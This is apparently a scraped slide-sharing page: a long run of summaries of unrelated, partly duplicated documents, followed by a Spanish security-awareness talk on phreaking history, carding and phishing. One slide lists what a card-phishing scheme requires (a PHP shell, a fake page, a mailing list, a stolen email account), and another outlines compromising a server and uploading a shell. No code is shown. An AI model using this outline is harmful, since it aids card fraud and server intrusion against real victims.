Este documento presenta información sobre seguridad informática y fraude en línea. Explica conceptos como carding, phishing, botnets y doxing. También proporciona definiciones de términos técnicos comunes como IP, DNS, virus y base de datos. Además, describe vulnerabilidades como inyección SQL, XSS y RFI e incluye ejemplos de herramientas y técnicas utilizadas para explotar estas vulnerabilidades con fines ilícitos.
Este documento explica cómo implementar internacionalización (i18n) en una aplicación PHP. Se discuten posibles soluciones como duplicar el proyecto o usar constantes, pero la mejor opción es usar las funciones gettext() y _(alias de gettext()) junto con archivos .po y .mo. Estos archivos separan el texto de la traducción y permiten cambiar el idioma fácilmente. El documento también cubre cómo establecer variables y configuraciones regionales, enlazar dominios de texto y encontrar traducciones.
Cómo realizar web scrapping en PHP y usando PHP Simple HTML DOM Parser con WordPress para obtener y almacenar la información. Exposición para la comunidad WordPress Perú.
This document discusses using a Bose-Einstein condensate for quantum simulation by applying laser fields with arbitrary amplitude and phase control. It describes producing a BEC using evaporative cooling in a magneto-optical trap. Computer-generated holograms can create arbitrary laser fields by imprinting a phase pattern on a spatial light modulator. The document focuses on using a conjugate gradient minimization algorithm to optimize the phase pattern to produce a desired laser intensity profile. Debugging the existing code improved amplitude and phase control by applying Fourier shifts and normalizing terms. Various error metrics were used to quantify the quality of generated patterns compared to targets.
O documento discute a evolução das ideias geológicas sobre a Terra, desde o catastrofismo de Georges Cuvier até o uniformitarismo de James Hutton e Charles Lyell. No século XX, ressurgiu o neocatastrofismo, que aceita eventos catastróficos esporádicos dentro de um quadro geral de uniformitarismo.
As três panteras populares são: 1) a pantera africana ou leopardo, 2) a pantera americana ou onça e 3) a pantera negra, que na verdade pertence à mesma espécie do leopardo.
Este documento discute la distribución de la riqueza en los Estados Unidos y Colombia. Explica que el 1% más rico de los estadounidenses posee el 40% de la riqueza total, mientras que el 80% menos rico solo posee el 7%. También identifica algunos de los grupos económicos más grandes de Colombia como Grupo Santo Domingo y Grupo Luis Carlos Sarmiento Angulo, cuyos ingresos provienen en gran parte de los hogares colombianos a través de la compra de productos y servicios. El documento conclu
Ppt 17 Vantagens E Desvantagens Da ReproduçãO SexuadaNuno Correia
O documento discute como diferentes espécies podem se reproduzir assexuadamente ou sexuadamente dependendo das condições ambientais. Ele também menciona que pesquisadores confirmaram um caso de reprodução assexuada em tubarões e que isso pode se tornar mais comum com a queda das populações.
BUDIÑO, Gabriel; CORREA, Natalia; PINTOS, Gabriela. “Uso de medios sociales en el Área Social de la UdelaR: discursos y prácticas”, IV Jornadas Académicas de la Facultad de Ciencias Económicas y de Administración, Montevideo (Uruguay), 29 de agosto.
Este documento explica cómo implementar internacionalización (i18n) en una aplicación PHP. Se discuten posibles soluciones como duplicar el proyecto o usar constantes, pero la mejor opción es usar las funciones gettext() y _(alias de gettext()) junto con archivos .po y .mo. Estos archivos separan el texto de la traducción y permiten cambiar el idioma fácilmente. El documento también cubre cómo establecer variables y configuraciones regionales, enlazar dominios de texto y encontrar traducciones.
Cómo realizar web scrapping en PHP y usando PHP Simple HTML DOM Parser con WordPress para obtener y almacenar la información. Exposición para la comunidad WordPress Perú.
This document discusses using a Bose-Einstein condensate for quantum simulation by applying laser fields with arbitrary amplitude and phase control. It describes producing a BEC using evaporative cooling in a magneto-optical trap. Computer-generated holograms can create arbitrary laser fields by imprinting a phase pattern on a spatial light modulator. The document focuses on using a conjugate gradient minimization algorithm to optimize the phase pattern to produce a desired laser intensity profile. Debugging the existing code improved amplitude and phase control by applying Fourier shifts and normalizing terms. Various error metrics were used to quantify the quality of generated patterns compared to targets.
O documento discute a evolução das ideias geológicas sobre a Terra, desde o catastrofismo de Georges Cuvier até o uniformitarismo de James Hutton e Charles Lyell. No século XX, ressurgiu o neocatastrofismo, que aceita eventos catastróficos esporádicos dentro de um quadro geral de uniformitarismo.
As três panteras populares são: 1) a pantera africana ou leopardo, 2) a pantera americana ou onça e 3) a pantera negra, que na verdade pertence à mesma espécie do leopardo.
Este documento discute la distribución de la riqueza en los Estados Unidos y Colombia. Explica que el 1% más rico de los estadounidenses posee el 40% de la riqueza total, mientras que el 80% menos rico solo posee el 7%. También identifica algunos de los grupos económicos más grandes de Colombia como Grupo Santo Domingo y Grupo Luis Carlos Sarmiento Angulo, cuyos ingresos provienen en gran parte de los hogares colombianos a través de la compra de productos y servicios. El documento conclu
Ppt 17 Vantagens E Desvantagens Da ReproduçãO SexuadaNuno Correia
O documento discute como diferentes espécies podem se reproduzir assexuadamente ou sexuadamente dependendo das condições ambientais. Ele também menciona que pesquisadores confirmaram um caso de reprodução assexuada em tubarões e que isso pode se tornar mais comum com a queda das populações.
BUDIÑO, Gabriel; CORREA, Natalia; PINTOS, Gabriela. “Uso de medios sociales en el Área Social de la UdelaR: discursos y prácticas”, IV Jornadas Académicas de la Facultad de Ciencias Económicas y de Administración, Montevideo (Uruguay), 29 de agosto.
O documento discute a deformação de rochas, incluindo deformação elástica e plástica. Ele também cobre fatores que afetam a deformação como temperatura, pressão e tempo. Por fim, aborda conceitos como falhas, dobras e plissamentos em rochas.
La empresa "LA BICIBIRRA S.L." ofrece tours de 1 hora y 30 minutos en bicicletas por Burgos con conductor y camarero. Es una sociedad limitada formada por 4 socios que busca promover el ocio, cultura y turismo de la ciudad de una forma ecológica, dirigida a grupos de todas las edades.
Ciências naturais 7 vulcanismo v (vesúvio)Nuno Correia
O Vesúvio é um vulcão ativo localizado na Itália perto de Nápoles. Ele entrou em erupção destrutivamente em 79 d.C., enterrado as cidades de Pompeia e Herculano. O Vesúvio continua sendo monitorado de perto devido aos riscos de erupções futuras.
La teoría de las relaciones humanas surgió en respuesta a los resultados del experimento de Hawthorne que mostraron que factores psicológicos y sociales afectan la productividad de los trabajadores más que factores físicos. El experimento encontró que la integración social y sentirse aceptado por los compañeros de trabajo aumentan la productividad más que factores como la iluminación o descansos. La teoría propuso que los gerentes deben organizar el lugar de trabajo para que los trabajadores se sientan comprometidos con sus grupos pequeños
Este documento presenta la aplicación Banana Run, la cual permite a los usuarios registrar y comparar sus rutas de carrera. La aplicación guarda información como distancia, velocidad y tiempo para cada carrera, y los usuarios pueden ver estadísticas generales y por sesión individual. La aplicación funciona en segundo plano para permitir el uso del teléfono durante la carrera, y cuenta con soporte multidioma y texto a voz.
El documento describe los beneficios de realizar proyectos colaborativos entre aulas de diferentes escuelas. Estos proyectos promueven el respeto por otras culturas, el desarrollo de empatía y relaciones de trabajo entre personas diversas. También fomentan el aprendizaje interdisciplinario y la investigación. Sin embargo, estos proyectos requieren tiempo y esfuerzo para coordinar entre escuelas y culturas diferentes, y a veces pueden enfrentar desafíos técnicos.
Gioia de Melo, Alina Machado y Alfonso Miranda. El impacto de un programa Un Computador por Niño en el aprendizaje. Evidencia para Uruguay. XVII jornada de TIC aplicadas a la educación para docentes de la FCEA, 5 de mayo de 2014.
O documento discute como as mutações genéticas, ou alterações na sequência do DNA, podem ocorrer e afetar os organismos. As mutações podem ser prejudiciais, benéficas ou neutras, e resultam em variações genéticas que são importantes para a evolução e adaptação das espécies. Algumas mutações podem causar doenças genéticas em humanos.
El documento no contiene información sustancial para resumir. Consiste únicamente en el nombre "Segundo M." repetido dos veces sin ningún otro contexto o detalles.
Este documento describe la propuesta de "Participación para el Aprendizaje" de la Secretaría de Educación de Bogotá (SED) para enseñar a los estudiantes a facilitar procesos de formación ciudadana a través de la participación. Los docentes estimularán el pensamiento crítico de los estudiantes para que definan una agenda de acción ciudadana. La SED proporciona una guía para cabildos estudiantiles que cubre objetivos, conceptos, valores y herramientas de aprendizaje. El proceso incluye precabildos, cabild
O documento discute estratégias de relacionamento com o consumidor, definindo clientes internos e externos. Aborda a importância do atendimento ao cliente, motivado por suas necessidades. Lista direitos do consumidor e competências fundamentais para a linha de frente, como empatia e resolução de problemas.
La actividad involucró a los niños en conocer y probar diferentes frutas y verduras de manera sensorial, mientras la educadora explicaba sus beneficios y contrastaba con alimentos menos saludables. Luego de tocar, oler y probar los alimentos, los niños disfrutaron de brochetas de frutas compartiendo sus experiencias.
Este documento describe las etapas de un proyecto de arte colaborativo entre escuelas. El proyecto involucra la búsqueda de escuelas asociadas, el establecimiento de aulas conectadas, el intercambio inicial de conocimientos y la construcción colaborativa de un mural. El objetivo final es fomentar el intercambio cultural y artístico continuo entre las escuelas participantes.
El documento presenta una charla sobre la caridad como entrega ante el Consejo Pastoral Diocesano. La charla analiza el contexto actual de crisis y los datos sobre la situación de pobreza en Euskadi y Gipuzkoa. Se destaca el aumento de perceptores de renta de garantía de ingresos y prestación complementaria de vivienda, así como el incremento del paro. Finalmente, se concretan los datos observados por Caritas Gipuzkoa sobre el aumento de personas atendidas.
O documento discute a história da Terra e da vida, incluindo a evolução das espécies ao longo do tempo, extinções em massa, e possíveis causas como impactos de meteoritos. A profissão de geólogo é descrita como estudando a composição e história da Terra através das rochas e fósseis.
Este documento presenta el plan de gestión de las TIC para la Institución Educativa José Acevedo y Gómez. El plan incluye un diagnóstico institucional, objetivos, líneas estratégicas, programas, proyectos, acciones e indicadores. El objetivo general es fortalecer el equipo de gestión de las TIC e implementar el plan para mejorar los procesos académicos y administrativos a través del uso de las herramientas tecnológicas. El plan también busca mejorar la infraestructura tecnol
Este documento describe el plan de producción de una organización textil. Explica el proceso de producción que incluye la compra de materia prima, diseño, corte, confección, ensamblaje y embalaje de prendas. También presenta los costos estimados de producción, el personal involucrado en cada departamento como gerencia, administración, diseño, producción, compras y ventas, y sus respectivas actividades.
El documento presenta el Plan de Desarrollo 2012-2015 del municipio de Venadillo. El plan tiene como objetivo promover el desarrollo humano con participación y transparencia. Describe los principios, la metodología y los ejes del plan, que incluyen el fortalecimiento social, económico, institucional, la infancia/adolescencia y la reducción de la pobreza extrema. El plan busca mejorar las condiciones de vida de los ciudadanos a través de estrategias participativas y transparentes en diferentes sectores como educación, salud y
Windows 7 es una versión de Microsoft Windows diseñada para uso en PC y equipos portátiles. Fue concebido como una actualización incremental de Windows Vista con mejoras a la interfaz de usuario, capacidades multitáctiles y rendimiento general. Mac OS es el sistema operativo de Apple conocido por su interfaz gráfica pionera y estabilidad. La versión más reciente es Mac OS X Snow Leopard. Linux es un sistema operativo de código abierto compatible con Unix que se distribuye gratuitamente junto con su código fuente bajo la licencia GPL.
Este documento describe una vulnerabilidad de sitio cruzado (XSS) que afecta a Hotmail de Microsoft. El autor proporciona una prueba de concepto que permite a los atacantes leer mensajes de correo electrónico de otros usuarios de Hotmail mediante la explotación de esta vulnerabilidad XSS. Microsoft agradece al investigador por informar sobre la vulnerabilidad y promete actualizar el sistema para abordar el problema una vez que se active la característica "a" a fines de octubre.
Presentación Workshop php Barcelona Seguridadguestbfa74a
Este documento presenta una introducción a los ataques más comunes contra sitios PHP y métodos para evitarlos. Se describen ataques como inyección HTML, SQL, de archivos remotos y de código PHP, así como formas de escapar entradas, usar captchas y limpiar código HTML. El objetivo es ayudar a proteger sitios PHP de acciones maliciosas.
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesNextel S.A.
El documento presenta una introducción a viejas vulnerabilidades como las incluidas en el OWASP Top 10 de 2013 (inyecciones, autenticación rota, XSS) y nuevas vulnerabilidades relacionadas con HTML5. Luego profundiza en cada vulnerabilidad del OWASP Top 10, mostrando ejemplos prácticos de inyecciones SQL, XSS, CSRF y más. Finalmente, concluye con demostraciones de ataques emergentes que aprovechan características de HTML5 sin necesidad de scripts.
O documento discute a deformação de rochas, incluindo deformação elástica e plástica. Ele também cobre fatores que afetam a deformação como temperatura, pressão e tempo. Por fim, aborda conceitos como falhas, dobras e plissamentos em rochas.
La empresa "LA BICIBIRRA S.L." ofrece tours de 1 hora y 30 minutos en bicicletas por Burgos con conductor y camarero. Es una sociedad limitada formada por 4 socios que busca promover el ocio, cultura y turismo de la ciudad de una forma ecológica, dirigida a grupos de todas las edades.
Ciências naturais 7 vulcanismo v (vesúvio)Nuno Correia
O Vesúvio é um vulcão ativo localizado na Itália perto de Nápoles. Ele entrou em erupção destrutivamente em 79 d.C., enterrado as cidades de Pompeia e Herculano. O Vesúvio continua sendo monitorado de perto devido aos riscos de erupções futuras.
La teoría de las relaciones humanas surgió en respuesta a los resultados del experimento de Hawthorne que mostraron que factores psicológicos y sociales afectan la productividad de los trabajadores más que factores físicos. El experimento encontró que la integración social y sentirse aceptado por los compañeros de trabajo aumentan la productividad más que factores como la iluminación o descansos. La teoría propuso que los gerentes deben organizar el lugar de trabajo para que los trabajadores se sientan comprometidos con sus grupos pequeños
Este documento presenta la aplicación Banana Run, la cual permite a los usuarios registrar y comparar sus rutas de carrera. La aplicación guarda información como distancia, velocidad y tiempo para cada carrera, y los usuarios pueden ver estadísticas generales y por sesión individual. La aplicación funciona en segundo plano para permitir el uso del teléfono durante la carrera, y cuenta con soporte multidioma y texto a voz.
El documento describe los beneficios de realizar proyectos colaborativos entre aulas de diferentes escuelas. Estos proyectos promueven el respeto por otras culturas, el desarrollo de empatía y relaciones de trabajo entre personas diversas. También fomentan el aprendizaje interdisciplinario y la investigación. Sin embargo, estos proyectos requieren tiempo y esfuerzo para coordinar entre escuelas y culturas diferentes, y a veces pueden enfrentar desafíos técnicos.
Gioia de Melo, Alina Machado y Alfonso Miranda. El impacto de un programa Un Computador por Niño en el aprendizaje. Evidencia para Uruguay. XVII jornada de TIC aplicadas a la educación para docentes de la FCEA, 5 de mayo de 2014.
O documento discute como as mutações genéticas, ou alterações na sequência do DNA, podem ocorrer e afetar os organismos. As mutações podem ser prejudiciais, benéficas ou neutras, e resultam em variações genéticas que são importantes para a evolução e adaptação das espécies. Algumas mutações podem causar doenças genéticas em humanos.
El documento no contiene información sustancial para resumir. Consiste únicamente en el nombre "Segundo M." repetido dos veces sin ningún otro contexto o detalles.
Este documento describe la propuesta de "Participación para el Aprendizaje" de la Secretaría de Educación de Bogotá (SED) para enseñar a los estudiantes a facilitar procesos de formación ciudadana a través de la participación. Los docentes estimularán el pensamiento crítico de los estudiantes para que definan una agenda de acción ciudadana. La SED proporciona una guía para cabildos estudiantiles que cubre objetivos, conceptos, valores y herramientas de aprendizaje. El proceso incluye precabildos, cabild
O documento discute estratégias de relacionamento com o consumidor, definindo clientes internos e externos. Aborda a importância do atendimento ao cliente, motivado por suas necessidades. Lista direitos do consumidor e competências fundamentais para a linha de frente, como empatia e resolução de problemas.
La actividad involucró a los niños en conocer y probar diferentes frutas y verduras de manera sensorial, mientras la educadora explicaba sus beneficios y contrastaba con alimentos menos saludables. Luego de tocar, oler y probar los alimentos, los niños disfrutaron de brochetas de frutas compartiendo sus experiencias.
Este documento describe las etapas de un proyecto de arte colaborativo entre escuelas. El proyecto involucra la búsqueda de escuelas asociadas, el establecimiento de aulas conectadas, el intercambio inicial de conocimientos y la construcción colaborativa de un mural. El objetivo final es fomentar el intercambio cultural y artístico continuo entre las escuelas participantes.
El documento presenta una charla sobre la caridad como entrega ante el Consejo Pastoral Diocesano. La charla analiza el contexto actual de crisis y los datos sobre la situación de pobreza en Euskadi y Gipuzkoa. Se destaca el aumento de perceptores de renta de garantía de ingresos y prestación complementaria de vivienda, así como el incremento del paro. Finalmente, se concretan los datos observados por Caritas Gipuzkoa sobre el aumento de personas atendidas.
O documento discute a história da Terra e da vida, incluindo a evolução das espécies ao longo do tempo, extinções em massa, e possíveis causas como impactos de meteoritos. A profissão de geólogo é descrita como estudando a composição e história da Terra através das rochas e fósseis.
Este documento presenta el plan de gestión de las TIC para la Institución Educativa José Acevedo y Gómez. El plan incluye un diagnóstico institucional, objetivos, líneas estratégicas, programas, proyectos, acciones e indicadores. El objetivo general es fortalecer el equipo de gestión de las TIC e implementar el plan para mejorar los procesos académicos y administrativos a través del uso de las herramientas tecnológicas. El plan también busca mejorar la infraestructura tecnol
Este documento describe el plan de producción de una organización textil. Explica el proceso de producción que incluye la compra de materia prima, diseño, corte, confección, ensamblaje y embalaje de prendas. También presenta los costos estimados de producción, el personal involucrado en cada departamento como gerencia, administración, diseño, producción, compras y ventas, y sus respectivas actividades.
El documento presenta el Plan de Desarrollo 2012-2015 del municipio de Venadillo. El plan tiene como objetivo promover el desarrollo humano con participación y transparencia. Describe los principios, la metodología y los ejes del plan, que incluyen el fortalecimiento social, económico, institucional, la infancia/adolescencia y la reducción de la pobreza extrema. El plan busca mejorar las condiciones de vida de los ciudadanos a través de estrategias participativas y transparentes en diferentes sectores como educación, salud y
Windows 7 es una versión de Microsoft Windows diseñada para uso en PC y equipos portátiles. Fue concebido como una actualización incremental de Windows Vista con mejoras a la interfaz de usuario, capacidades multitáctiles y rendimiento general. Mac OS es el sistema operativo de Apple conocido por su interfaz gráfica pionera y estabilidad. La versión más reciente es Mac OS X Snow Leopard. Linux es un sistema operativo de código abierto compatible con Unix que se distribuye gratuitamente junto con su código fuente bajo la licencia GPL.
Este documento describe una vulnerabilidad de sitio cruzado (XSS) que afecta a Hotmail de Microsoft. El autor proporciona una prueba de concepto que permite a los atacantes leer mensajes de correo electrónico de otros usuarios de Hotmail mediante la explotación de esta vulnerabilidad XSS. Microsoft agradece al investigador por informar sobre la vulnerabilidad y promete actualizar el sistema para abordar el problema una vez que se active la característica "a" a fines de octubre.
Presentación Workshop php Barcelona Seguridadguestbfa74a
Este documento presenta una introducción a los ataques más comunes contra sitios PHP y métodos para evitarlos. Se describen ataques como inyección HTML, SQL, de archivos remotos y de código PHP, así como formas de escapar entradas, usar captchas y limpiar código HTML. El objetivo es ayudar a proteger sitios PHP de acciones maliciosas.
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesNextel S.A.
El documento presenta una introducción a viejas vulnerabilidades como las incluidas en el OWASP Top 10 de 2013 (inyecciones, autenticación rota, XSS) y nuevas vulnerabilidades relacionadas con HTML5. Luego profundiza en cada vulnerabilidad del OWASP Top 10, mostrando ejemplos prácticos de inyecciones SQL, XSS, CSRF y más. Finalmente, concluye con demostraciones de ataques emergentes que aprovechan características de HTML5 sin necesidad de scripts.
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 20104v4t4r
El documento habla sobre la implementación de laboratorios de entrenamiento en seguridad de la información. Estos laboratorios permitirían realizar prácticas de pruebas de penetración, hardening, análisis forense digital y análisis de malware de manera colaborativa. Se mencionan algunos de los desafíos de implementar estos laboratorios como costos, tiempo y problemas legales. También se discuten algunas herramientas y tecnologías que podrían usarse como virtualización y diferentes sistemas operativos.
Seguridad en los videojuegos - GoD ModeZink Security
El documento presenta una agenda sobre seguridad en videojuegos que incluye una presentación, antecedentes, distintos ámbitos (web y escritorio) y recomendaciones para el desarrollo seguro. Se analizan amenazas comunes como suplantación de identidad, robo de cuentas y trampas. También se discuten medidas para proteger juegos web como validación de parámetros en el servidor y para juegos de escritorio como protección contra vulnerabilidades de código.
Practica 1 seguridad en bases de datosCarlos Otero
Este documento describe cómo realizar ataques de seguridad como inyección SQL, sniffing de paquetes y modificación de cookies utilizando las herramientas Badstore, sqlmap y Wireshark. Explica cómo instalar Badstore para practicar vulnerabilidades comunes como XSS e inyección SQL, y cómo usar sqlmap para escanear bases de datos y extraer datos de usuarios de un sitio vulnerable. También cubre cómo Wireshark puede capturar tráfico de red no cifrado para robar nombres de usuario y contraseñas.
Cómo realizar un test de intrusión a una aplicación WebEduardo Jalon
El documento describe cómo realizar un test de intrusión a una aplicación web. Explica que existen más de 300 vulnerabilidades comunes y presenta las 10 más frecuentes, incluyendo inyección, ejecución de archivos maliciosos, filtraciones de información y autenticación débil. Además, proporciona consejos prácticos para identificar la plataforma web, encontrar páginas ocultas y probar posibles vulnerabilidades mediante la modificación de parámetros.
Symlink, una vulnerabilidad de servidor Apache, como con ella lograr comprometer todo el servidor y tomar control de todo.
Charla presentada en: Universidad Simon Bolivar.
“Este ejercicio se inicia con base en la premisa de un Atacante ávido de información e inundado de adrenalina al lograr la posesión o control de una Victima sobre la Web, a merced de sus designios y emociones, manipulador y malicioso, al dirigir a su presa a lo mas profundo de sus abismos”
Este documento presenta información sobre cómo detectar y prevenir infecciones de malware en un equipo. Explica señales comunes de infección como nuevos elementos en el navegador, cambios en la página de inicio o búsqueda, mensajes emergentes o un rendimiento más lento. También proporciona consejos sobre mantener software antivirus y antimalware actualizado para proteger los equipos.
Este documento proporciona consejos sobre cómo mejorar el rendimiento de Magento. Explica cómo instalar Magento de forma básica, identificar cuellos de botella mediante herramientas como XHProf y Onestic Profiler, y realizar pruebas de carga. También recomienda el uso de caché externa como Varnish o Ezapps Zoom, y escalar la infraestructura separando la aplicación del servidor de base de datos.
La problemática de la identificación de los participantes en las plataformas ...Jaime Sánchez
El documento discute los desafíos de la geolocalización en entornos en línea. Explica que la privacidad en Internet implica el control de la información personal del usuario y su derecho a la privacidad. Luego, analiza formas de ocultar la ubicación como el uso de VPN, proxies anónimos y herramientas como p0f para identificar sistemas operativos de manera pasiva rastreando metadatos en paquetes de red.
Seguridad en Aplicaciones Web y Comercio ElectrónicoRené Olivo
Este documento discute varios temas relacionados con la seguridad en aplicaciones web y comercio electrónico. Explica mitos comunes sobre la seguridad, cómo documentarse sobre seguridad, y cómo analizar vulnerabilidades en un sitio web. También recomienda implementar pruebas unitarias y minimizar el uso de componentes externos de baja confianza para mejorar la seguridad.
Hack & beers lleida seguridad en desarrollo fullstackMarc Pàmpols
Este documento proporciona consejos sobre seguridad en el desarrollo fullstack, incluyendo seguridad para servidores, redes, bases de datos, programación frontend y backend, y experiencia de usuario. Recomienda encriptar comunicaciones, actualizar software, revisar permisos, y elegir frameworks probados. También advierte sobre problemas como inyecciones SQL, XSS, y spam/scammers, y comparte experiencias implementando seguridad en un sitio web.
Mejores prácticas desarrollo de base de datos Eduardo Castro
1) El documento habla sobre mejores prácticas para el desarrollo de bases de datos, incluyendo el ciclo de vida de aplicaciones de base de datos, consejos de diseño y consideraciones de seguridad. 2) También discute la inyección SQL, una vulnerabilidad común, y técnicas para prevenirla como la validación de entrada y el uso de procedimientos almacenados. 3) Finalmente, ofrece recomendaciones para auditar aplicaciones existentes y endurecer servidores para fortalecer la defensa contra la inyección SQL.
Introducción a esta base de datos NoSQL que permite desarrollar aplicaciones altamente escalables gracias a su velocidad (100k operaciones por segundo en un ordenador corriente) y su capacidad de trabajar en varios nodos.
KAWARU CONSULTING presenta el projecte amb l'objectiu de permetre als ciutadans realitzar tràmits administratius de manera telemàtica, des de qualsevol lloc i dispositiu, amb seguretat jurídica. Aquesta plataforma redueix els desplaçaments físics i el temps invertit en tràmits, ja que es pot fer tot en línia. A més, proporciona evidències de la correcta realització dels tràmits, garantint-ne la validesa davant d'un jutge si cal. Inicialment concebuda per al Ministeri de Justícia, la plataforma s'ha expandit per adaptar-se a diverses organitzacions i països, oferint una solució flexible i fàcil de desplegar.
Catalogo Refrigeracion Miele Distribuidor Oficial Amado Salvador ValenciaAMADO SALVADOR
Descubre el catálogo general de la gama de productos de refrigeración del fabricante de electrodomésticos Miele, presentado por Amado Salvador distribuidor oficial Miele en Valencia. Como distribuidor oficial de electrodomésticos Miele, Amado Salvador ofrece una amplia selección de refrigeradores, congeladores y soluciones de refrigeración de alta calidad, resistencia y diseño superior de esta marca.
La gama de productos de Miele se caracteriza por su innovación tecnológica y eficiencia energética, garantizando que cada electrodoméstico no solo cumpla con las expectativas, sino que las supere. Los refrigeradores Miele están diseñados para ofrecer un rendimiento óptimo y una conservación perfecta de los alimentos, con características avanzadas como la tecnología de enfriamiento Dynamic Cooling, sistemas de almacenamiento flexible y acabados premium.
En este catálogo, encontrarás detalles sobre los distintos modelos de refrigeradores y congeladores Miele, incluyendo sus especificaciones técnicas, características destacadas y beneficios para el usuario. Amado Salvador, como distribuidor oficial de electrodomésticos Miele, garantiza que todos los productos cumplen con los más altos estándares de calidad y durabilidad.
Explora el catálogo completo y encuentra el refrigerador Miele perfecto para tu hogar con Amado Salvador, el distribuidor oficial de electrodomésticos Miele.
Catalogo General Electrodomesticos Teka Distribuidor Oficial Amado Salvador V...AMADO SALVADOR
El catálogo general de electrodomésticos Teka presenta una amplia gama de productos de alta calidad y diseño innovador. Como distribuidor oficial Teka, Amado Salvador ofrece soluciones en electrodomésticos Teka que destacan por su tecnología avanzada y durabilidad. Este catálogo incluye una selección exhaustiva de productos Teka que cumplen con los más altos estándares del mercado, consolidando a Amado Salvador como el distribuidor oficial Teka.
Explora las diversas categorías de electrodomésticos Teka en este catálogo, cada una diseñada para satisfacer las necesidades de cualquier hogar. Amado Salvador, como distribuidor oficial Teka, garantiza que cada producto de Teka se distingue por su excelente calidad y diseño moderno.
Amado Salvador, distribuidor oficial Teka en Valencia. La calidad y el diseño de los electrodomésticos Teka se reflejan en cada página del catálogo, ofreciendo opciones que van desde hornos, placas de cocina, campanas extractoras hasta frigoríficos y lavavajillas. Este catálogo es una herramienta esencial para inspirarse y encontrar electrodomésticos de alta calidad que se adaptan a cualquier proyecto de diseño.
En Amado Salvador somos distribuidor oficial Teka en Valencia y ponemos atu disposición acceso directo a los mejores productos de Teka. Explora este catálogo y encuentra la inspiración y los electrodomésticos necesarios para equipar tu hogar con la garantía y calidad que solo un distribuidor oficial Teka puede ofrecer.
1. WWW.WEBSEC.ES
WWW.CIBERENCUENTROS.ES
Mas responsabilidad y mas seguridad en tus datos |
| Seguridad INFORMATICA
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 1
2. PRESENTACION:
• Me llamo Jorge
• Me dedico a la seguridad informatica.
• Mi web personal es [WEBSEC.ES]
• Mi correo es jorge@websec.es
• Quantika14
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 2
3. MÁS RESPONSABILIDAD Y SEGURIDAD EN TUS
DATOS
• Para ser mas seguros tenemos que ser conscientes del medio que nos rodea.
• Para tener seguridad tenemos que saber nuestros sitios más débiles.
• Para ser mas responsable tenemos que saber el valor de nuestros datos y que daño
pueden causar en terceras manos.
• Para ser un usuario responsable y seguro con sus datos tiene que saber como se
realizan ataques y hasta donde se puede llegar.
• Un usuario que sepa entrar en un windows xp no lo pondrá en su negocio o en su casa.
No le pondrá a su hijo un equipo vulnerable. No tendrá contraseñas débiles. Actualizara y
será responsable y prudente con sus datos y en sus sistemas.
• Y el saber no ocupa lugar y saber esto es cada día más importante.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 3
4. ¿QUÉ VAMOS A DAR?
1. Definiciones
2. Fraude Online
CARDING
Phishing
Pharming
3. ¿Qué son las Botnets?
4. ¿Qué es el Doxing?
5. Prueba AutoPwn + Nmap
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 4
5. DEFINICIONES
• IP: Etiqueta numérica que identifica a un sistema en la red de manera unívoca.
• DNS: Domain Name Service. Servicio de resolución de dominios. Traduce dominios a
direcciones IP.
• Virus: Software generalmente malicioso con capacidad de replicación y/o infección de
ficheros.
• Base de Datos(DB): conjunto de datos, clasificados por tablas,
columnas y registros. Aplicaciones PostgresSQL, MYSQL
• Host: Maquina conectada en un red y utiliza o da servicios.
• Puerto: es el valor que se usa, en el modelo de la capa de transporte, para distinguir entre las
múltiples aplicaciones que se pueden conectar al mismo host. Ejemplo 80 HTTP.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 5
6. FRAUDE ONLINE – ME LO
LLEVO- YO NO SOY TONTO
CARDING &
PHISHING
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 6
7. ¿QUÉ ES EL PHREAKING?
Constante estudio de las redes telefónicas y sus ramas, para la personificación, modificación,
creación de sistemas, accesos no autorizados etc.
Podemos separar el phreaking en 2 ramas principales:
- Redes telefónicas. (Phreak clásico)
- Aparatos telefónicos. (Phreak contemporáneo)
Redes telefónicas :
Se trabaja con las redes y distintas compañías, buscando y encontrando bugs y como explotarlos.
(Como la conocida Caja Azul o lo que nos enseño nuestro querido Capitán Crunch)
Aparatos telefónicos:
Se trabaja con todo aparato telefónico, no solo móviles, sino teléfonos fijos, micrófonos y todo su
cableado. El fin de un Phreak es el mismo que un ingeniero de redes telefónicas, conocer todo el
funcionamiento de los sistemas para encontrar errores y vulnerabilidades.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 7
8. John Draper o Capitán Crunch
• Leyenda Hacker
• Años 70, el tenia 27 años.
• La empresa Quaker Oaks comercializa
cereales ―Cap’n Crunch‖.
• En ella había un regalo, un silbato azul.
• Si tapaba con pegamento un agujero
emitía 2600 Hz.
• Construyo la ―caja azul‖, un dispositivo
capaz de reproducir el resto de tonos.
• El primer prototipo de APPLE fue
financiado con el dinero que
conseguían vendiendo las cajas azul,
Steve Jobs, Steve Wozniak y John.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 8
9. HISTORIA SECRETA DE LOS HACKERS
INFORMÁTICOS
http://www.youtube.com/watch?v=oloOmqOCXN4
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 9
10. CARDING
• ¿Qué es?: Es el uso ilegitimo de las tarjetas de crédito de otras personas.
• Estructura de las tarjetas de crédito:
1. Son 16 dígitos divididos en 4 grupos de 4 dígitos. Del 0 al 9.
2. Los 4 primeros determinan el banco.
3. ->American Express (15 dígitos)
->VISA (13 o 16 dígitos)
->Mastercard (16 dígitos)
->Discover (16 dígitos)
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 10
11. ¿SOMOS MALOS?
• ¿Qué necesitamos?
1. Una Shell PHP en un servidor.
2. Una Fake.
3. Una lista de correos.
4. Un correo robado.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 11
12. ¿QUIERO MI SERVIDOR? =)
• Proceso de Footprinting.
• Análisis de vulnerabilidades.
• Explotación de vulnerabilidades.
• Generación de informe… no!!!, tenemos que pensar como un maligno.
• Subir Shell.
